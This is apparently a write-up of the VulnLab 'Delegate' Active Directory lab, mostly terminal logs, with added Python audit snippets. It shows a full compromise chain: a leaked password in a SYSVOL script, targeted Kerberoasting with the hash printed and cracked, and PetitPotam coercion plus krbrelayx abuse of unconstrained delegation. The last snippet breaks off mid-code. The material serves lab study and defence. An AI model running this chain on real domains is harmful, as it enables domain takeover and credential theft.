vulnlab-delegate
a hard machine
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023
5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\>
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
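As an added defender-side example (not part of the original writeup), a small audit that scans a logon script for `net use` lines carrying a cleartext password, the pattern that leaked A.Briggs' credentials from SYSVOL above; the script text is a constructed copy of users.bat and the report records only the length of the secret.

```python
import re
from typing import Dict, List

# Constructed copy of the users.bat pulled from SYSVOL above (same content as the
# page shows; the password is already disclosed on the page).
USERS_BAT = """rem @echo off
net use * /delete /y
net use v: \\\\dc1\\development
if %USERNAME%==A.Briggs net use h: \\\\fileserver\\backups /user:Administrator P4ssw0rd1#123
"""

# net use <drive> <\\server\share> /user:<name> <password>
# The password is the bare token after the /user: switch; "*" means "prompt"
# and is not a stored secret.
NET_USE_CRED = re.compile(
    r"net\s+use\s+(?P<drive>\S+)\s+(?P<unc>\\\\\S+)\s+/user:(?P<user>\S+)\s+(?P<secret>\S+)",
    re.IGNORECASE,
)


def find_embedded_credentials(script: str, path: str = "<constructed>") -> List[Dict[str, object]]:
    """Return one finding per line that hands net use a cleartext password.

    Only the length of the secret is recorded so the report can be circulated
    without repeating the password."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        m = NET_USE_CRED.search(line)
        if not m or m.group("secret") == "*":
            continue
        findings.append({
            "path": path,
            "line": lineno,
            "share": m.group("unc"),
            "user": m.group("user"),
            "secret": f"<{len(m.group('secret'))} chars>",
        })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(USERS_BAT, r"\\delegate.vl\SYSVOL\delegate.vl\scripts\users.bat"):
        print(f)
```

Run it over every .bat/.cmd/.ps1 under \\<domain>\SYSVOL\<domain>\scripts and Policies; SYSVOL is readable by every domain user, so anything it finds is already exposed.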
Run BloodHound to get more info.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S
Upload the data to BloodHound, and we find:
The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user.
A targeted Kerberoast attack can be performed using targetedKerberoast.py:
targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified on the command line, and then obtain a crackable hash.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py venv
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61
f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$
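As an added example (not from the writeup or from targetedKerberoast), a parser for the `$krb5tgs$` line printed above, splitting it into etype, user, realm, SPN, checksum and ciphertext and producing a triage note; it assumes impacket's output layout for etype 23 and 17/18, and the two sample hashes are constructed (page principal and SPN, dummy checksum and ciphertext).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Encryption type of the service ticket, the number right after "$krb5tgs$".
ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# Layouts as written by impacket's GetUserSPNs/targetedKerberoast (':' in an SPN is written as '~'):
#   RC4: $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes hex)$ciphertext
#   AES: $krb5tgs$17|18$user$REALM$*spn*$checksum(12 bytes hex)$ciphertext
RC4_RE = re.compile(r"^\$krb5tgs\$(23)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")
AES_RE = re.compile(r"^\$krb5tgs\$(1[78])\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-fA-F]{24})\$([0-9a-fA-F]+)$")


@dataclass
class KerberoastHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum: str
    edata: str

    @property
    def weak_rc4(self) -> bool:
        # An etype-23 ticket is encrypted under the account's NT hash, so a plain
        # wordlist run recovers the password, as john did above in seconds.
        return self.etype == 23


def parse_krb5tgs(line: str) -> Optional[KerberoastHash]:
    """Split one john/hashcat krb5tgs line into its fields; None if it is malformed."""
    line = line.strip()
    for rx in (RC4_RE, AES_RE):
        m = rx.match(line)
        if m:
            etype, user, realm, spn, checksum, edata = m.groups()
            return KerberoastHash(int(etype), user, realm, spn.replace("~", ":"), checksum, edata)
    return None


def triage_note(h: KerberoastHash) -> str:
    """One-line note for whoever owns the account in the finding."""
    algo = ETYPE_NAMES.get(h.etype, f"etype {h.etype}")
    if h.weak_rc4:
        return (f"{h.user}@{h.realm}: {algo} ticket for SPN {h.spn}; offline-crackable from the NT hash. "
                "Remove the SPN if it was planted, allow AES only in msDS-SupportedEncryptionTypes, "
                "and rotate to a long random password or a gMSA.")
    return f"{h.user}@{h.realm}: {algo} ticket for SPN {h.spn}; AES slows cracking but the key should still be rotated."


# Constructed samples: the principal and SPN from the page, with dummy checksum/ciphertext
# (the real hash above is several kilobytes long).
SAMPLE_RC4 = "$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$" + "0" * 32 + "$" + "ab" * 40
SAMPLE_AES = "$krb5tgs$18$svc_web$DELEGATE.VL$*http/web01.delegate.vl*$" + "1" * 24 + "$" + "cd" * 40

if __name__ == "__main__":
    for sample in (SAMPLE_RC4, SAMPLE_AES):
        parsed = parse_krb5tgs(sample)
        print(triage_note(parsed) if parsed else "unparseable line")
```

The SPN in the hash (delegate.vl/N.Thompson) is the one written by the attacker via GenericWrite, so the clean-up is to remove it and to audit who holds write rights on user objects, not only to rotate N.Thompson's password.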
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341 (?)
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP dc1.delegate.vl 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ dc1.delegate.vl 389 DC1 [*] Getting the MachineAccountQuota
MAQ dc1.delegate.vl 389 DC1 MachineAccountQuota: 10
A new tool, krbrelayx (dnstool, printerbug):
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git
Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py dnstool.py krbrelayx.py lib LICENSE printerbug.py README.md venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket
Collecting impacket
Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
New tools: bloodyAD.py, addspn.py & PetitPotam.py
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py bloodyAD dnstool.py krbrelayx.py lib LICENSE PetitPotam printerbug.py README.md venv
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py bloodyAD dnstool.py krbrelayx.py lib LICENSE PetitPotam printerbug.py README.md venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$
Below: bloodyAD installed in a Python virtual environment (I had trouble with dependencies).
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
Traceback (most recent call last):
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
from bloodyAD import main
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
from .network.config import Config, ConnectionHandler
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
from bloodyAD.network.ldap import Ldap
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Using Powermad & printerbug
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
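As an added defender-side example (not from the writeup), a userAccountControl decoder and an audit that flags non-DC accounts carrying TRUSTED_FOR_DELEGATION: the value 528384 passed to Set-MachineAccountAttribute above is 0x1000 (WORKSTATION_TRUST_ACCOUNT) | 0x80000 (TRUSTED_FOR_DELEGATION), and that bit on a freshly created machine account is what lets krbrelayx collect the DC's TGT. The account records are constructed.

```python
from typing import Dict, Iterable, List

# userAccountControl bits (MS-SAMR USER_* flags); the subset that matters for this chain.
UAC_FLAGS: Dict[str, int] = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,       # unconstrained delegation
    "NOT_DELEGATED": 0x100000,
    "DONT_REQUIRE_PREAUTH": 0x400000,        # what GetNPUsers looked for above
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
}


def decode_uac(value: int) -> List[str]:
    """Names of every set bit, lowest bit first."""
    return [name for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1]) if value & bit]


def is_unconstrained_non_dc(uac: int) -> bool:
    """Unconstrained delegation on anything that is not a domain controller.

    DCs carry SERVER_TRUST_ACCOUNT and have TRUSTED_FOR_DELEGATION by design;
    a workstation or user object with the bit set is the finding."""
    return bool(uac & UAC_FLAGS["TRUSTED_FOR_DELEGATION"]) and not (uac & UAC_FLAGS["SERVER_TRUST_ACCOUNT"])


def audit_delegation(accounts: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """accounts: records with sAMAccountName and userAccountControl, e.g. from an LDAP export.

    Returns the accounts a defender should review, with the flags decoded."""
    findings: List[Dict[str, object]] = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if is_unconstrained_non_dc(uac):
            findings.append({
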